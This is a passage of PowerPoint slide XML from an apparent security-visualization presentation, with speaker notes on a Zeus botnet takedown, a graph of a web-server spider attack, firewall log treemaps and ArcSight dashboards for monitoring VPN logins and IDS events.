              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t>This is part of an </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" err="1" smtClean="0"/>
              <a:t>Alienvault</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t> blog post about a takedown of a Zeus C&amp;C </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" err="1" smtClean="0"/>
              <a:t>botnet</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t>  </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" err="1" smtClean="0"/>
              <a:t>Troyak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t> AS 50215  </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Article: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>http://www.alienvault.com/open-threat-exchange/blog/troyak-as-and-peer-activity</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Image</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t> mirror: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>http://</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>secviz.org/content/troyak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>-as-and-peer-activity</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{979C8A94-F62E-4072-B85F-8EC1A23AAB45}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>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Spider attack</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t> against a web server </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>The red pillar in the image shows the barrage of HTTP requests over the whole content space (Z axis, vertical) from a single IP address (Y axis, horizontal). The red color is due to 5xx status code of the response.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>SOURCE:http</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>://secviz.org/content/spider-attack-a-web-server</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{979C8A94-F62E-4072-B85F-8EC1A23AAB45}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>10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Visualizing</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t> a firewall log file  </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>The picture was generated with </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>AfterGlow</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> 2.0. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>The hierarchy used is: Source Address | Target Port | Target Address </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>The coloring is based on the Source Address</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>SOURCE: http://secviz.org/content/firewall-outbound-traffic-a-treemap</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{979C8A94-F62E-4072-B85F-8EC1A23AAB45}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>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Arcsight</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t> Dashboards example </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t>Dashboards in </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" err="1" smtClean="0"/>
              <a:t>Arcsight</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t> are a great way when combined with time-based events to easily show information </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t>Red – bad </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t>Green – good </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t>Examples: </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t>Dashboard with all </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" err="1" smtClean="0"/>
              <a:t>Arcsight</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t> connectors and their status </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t>AV events of a certain type (Trojan, Botnet, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" err="1" smtClean="0"/>
              <a:t>etc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t>)  </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t>  or AV events of a certain type when detect is on a High Value Target </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{979C8A94-F62E-4072-B85F-8EC1A23AAB45}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>13</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718544177"/>
      </p:ext>
    </p:extLst>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Arcsight</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> 3-D</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t> tables example </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t>Tables are a great way when set to time-based limits to use visual acuity context clues (IE when the values in the displayed table change it’s not normal and therefore an action needs to occur). </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t>This is great for use </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="170637" indent="-170637">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t>Tracking VPN logins to Geo-locations when a new area/country is used a user is logging in from a new/different country </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="170637" indent="-170637">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t>Types or names of NIPS/NIDS events looking for new/different events </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{979C8A94-F62E-4072-B85F-8EC1A23AAB45}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>14</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51599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514601" y="6324600"/>
            <a:ext cx="3276599" cy="365125"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Proprietary - Releasable upon request from author</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Slide Number Placeholder 5"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6553200" y="6324600"/>
            <a:ext cx="2133600" cy="365125"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{1D16A858-589D-43AC-A57D-D3C5D92F8153}"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2461221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2590801" y="6324600"/>
            <a:ext cx="3276599" cy="365125"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Proprietary - Releasable upon request from author</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Slide Number Placeholder 5"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6553200" y="6324600"/>
            <a:ext cx="2133600" cy="365125"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{1D16A858-589D-43AC-A57D-D3C5D92F8153}"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31639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2590801" y="6324600"/>
            <a:ext cx="3276599" cy="365125"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Proprietary - Releasable upon request from author</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Slide Number Placeholder 5"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6553200" y="6324600"/>
            <a:ext cx="2133600" cy="365125"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{1D16A858-589D-43AC-A57D-D3C5D92F8153}"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97851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smtClean="0"/>
              <a:t>Proprietary - Releasable upon request from author</a:t>
            </a:r>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Slide Number Placeholder 5"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{6CB578AE-4A26-CC4C-B2F8-EB2C2A85F4AA}"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05375558"/>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44562"/>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19200"/>
            <a:ext cx="8229600" cy="4906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2590800" y="6324600"/>
            <a:ext cx="3276599" cy="365125"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Proprietary - Releasable upon request from author</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Slide Number Placeholder 5"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6553200" y="6324600"/>
            <a:ext cx="2133600" cy="365125"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{1D16A858-589D-43AC-A57D-D3C5D92F8153}"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3053594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5" name="Footer Placeholder 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ftr" sz="quarter" idx="11"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2590801" y="6324600"/>
            <a:ext cx="3276599" cy="365125"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Proprietary - Releasable upon request from author</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Slide Number Placeholder 5"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6553200" y="6324600"/>
            <a:ext cx="2133600" cy="365125"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{1D16A858-589D-43AC-A57D-D3C5D92F8153}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="8" name="Picture 2" descr="C:\Users\kglossin\Documents\Crypsis\Marketing\Crypsis_logo final_updated tagline.jpg"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
          </p:cNvPicPr>
          <p:nvPr userDrawn="1"/>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133600" y="2971800"/>
            <a:ext cx="4438825" cy="1066800"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeo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766954205"/>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r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Proprietary - Releasable upon request from author</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="Slide Number Placeholder 6"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{1D16A858-589D-43AC-A57D-D3C5D92F8153}"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24147304"/>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r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Proprietary - Releasable upon request from author</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="Slide Number Placeholder 8"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{1D16A858-589D-43AC-A57D-D3C5D92F8153}"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66050178"/>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2590801" y="6324600"/>
            <a:ext cx="3276599" cy="365125"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Proprietary - Releasable upon request from author</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Slide Number Placeholder 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6553200" y="6324600"/>
            <a:ext cx="2133600" cy="365125"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{1D16A858-589D-43AC-A57D-D3C5D92F8153}"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59017247"/>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Proprietary - Releasable upon request from author</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{1D16A858-589D-43AC-A57D-D3C5D92F8153}"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659246221"/>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a:xfrm>
            <a:off x="2590801" y="6324600"/>
            <a:ext cx="3276599" cy="365125"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Proprietary - Releasable upon request from author</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="Slide Number Placeholder 6"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6553200" y="6324600"/>
            <a:ext cx="2133600" cy="365125"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{1D16A858-589D-43AC-A57D-D3C5D92F8153}"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1247662"/>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a:xfrm>
            <a:off x="2590801" y="6324600"/>
            <a:ext cx="3276599" cy="365125"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Proprietary - Releasable upon request from author</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="Slide Number Placeholder 6"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6553200" y="6324600"/>
            <a:ext cx="2133600" cy="365125"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{1D16A858-589D-43AC-A57D-D3C5D92F8153}"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684436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9445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371600"/>
            <a:ext cx="8229600" cy="47545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2590801" y="6356350"/>
            <a:ext cx="3276599" cy="365125"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" lIns="91440" tIns="45720" rIns="91440" bIns="45720" rtlCol="0" anchor="ctr"/>
          <a:lstStyle>
            <a:lvl1pPr algn="ctr">
              <a:defRPr sz="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Proprietary - Releasable upon request from author</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solidFill>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:fld id="{D308F6D6-74CE-47C4-828E-5DDAC10D5D30}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="9" name="Straight Connector 8"/>
          <p:cNvCxnSpPr/>
          <p:nvPr userDrawn="1"/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="6172200"/>
            <a:ext cx="8229600"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C:\Users\kglossin\Documents\Crypsis\Marketing\Crypsis_logo final_updated tagline.jpg"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
          </p:cNvPicPr>
          <p:nvPr userDrawn="1"/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId1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02408" y="6297377"/>
            <a:ext cx="1371600" cy="329642"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeo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720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dt="0"/>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282575" indent="-282575" algn="l" defTabSz="914400" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
        <a:spcBef>
          <a:spcPct val="20000"/>
        </a:spcBef>
        <a:buClr>
          <a:schemeClr val="tx2"/>
        </a:buClr>
        <a:buFont typeface="Calibri" pitchFamily="34" charset="0"/>
        <a:buChar char="□"/>
        <a:defRPr sz="2800" kern="1200">
          <a:solidFill>
            <a:schemeClr val="tx1"/>
          </a:solidFill>
          <a:latin typeface="+mn-lt"/>
          <a:ea typeface="+mn-ea"/>
          <a:cs typeface="+mn-cs"/>
        </a:defRPr>
      </a:lvl1pPr>
      <a:lvl2pPr marL="577850" indent="-228600" algn="l" defTabSz="914400" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
        <a:spcBef>
          <a:spcPct val="20000"/>
        </a:spcBef>
        <a:buClr>
          <a:schemeClr val="tx2"/>
        </a:buClr>
        <a:buFont typeface="Calibri" pitchFamily="34" charset="0"/>
        <a:buChar char="□"/>
        <a:defRPr sz="2400" kern="1200">
          <a:solidFill>
            <a:schemeClr val="tx1"/>
          </a:solidFill>
          <a:latin typeface="+mn-lt"/>
          <a:ea typeface="+mn-ea"/>
          <a:cs typeface="+mn-cs"/>
        </a:defRPr>
      </a:lvl2pPr>
      <a:lvl3pPr marL="914400" indent="-228600" algn="l" defTabSz="914400" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
        <a:spcBef>
          <a:spcPct val="20000"/>
        </a:spcBef>
        <a:buClr>
          <a:schemeClr val="tx2"/>
        </a:buClr>
        <a:buFont typeface="Calibri" pitchFamily="34" charset="0"/>
        <a:buChar char="□"/>
        <a:defRPr sz="2000" kern="1200">
          <a:solidFill>
            <a:schemeClr val="tx1"/>
          </a:solidFill>
          <a:latin typeface="+mn-lt"/>
          <a:ea typeface="+mn-ea"/>
          <a:cs typeface="+mn-cs"/>
        </a:defRPr>
      </a:lvl3pPr>
      <a:lvl4pPr marL="1196975" indent="-228600" algn="l" defTabSz="914400" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
        <a:spcBef>
          <a:spcPct val="20000"/>
        </a:spcBef>
        <a:buClr>
          <a:schemeClr val="tx2"/>
        </a:buClr>
        <a:buFont typeface="Calibri" pitchFamily="34" charset="0"/>
        <a:buChar char="□"/>
        <a:defRPr sz="1800" kern="1200">
          <a:solidFill>
            <a:schemeClr val="tx1"/>
          </a:solidFill>
          <a:latin typeface="+mn-lt"/>
          <a:ea typeface="+mn-ea"/>
          <a:cs typeface="+mn-cs"/>
        </a:defRPr>
      </a:lvl4pPr>
      <a:lvl5pPr marL="1492250" indent="-228600" algn="l" defTabSz="914400" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
        <a:spcBef>
          <a:spcPct val="20000"/>
        </a:spcBef>
        <a:buClr>
          <a:schemeClr val="tx2"/>
        </a:buClr>
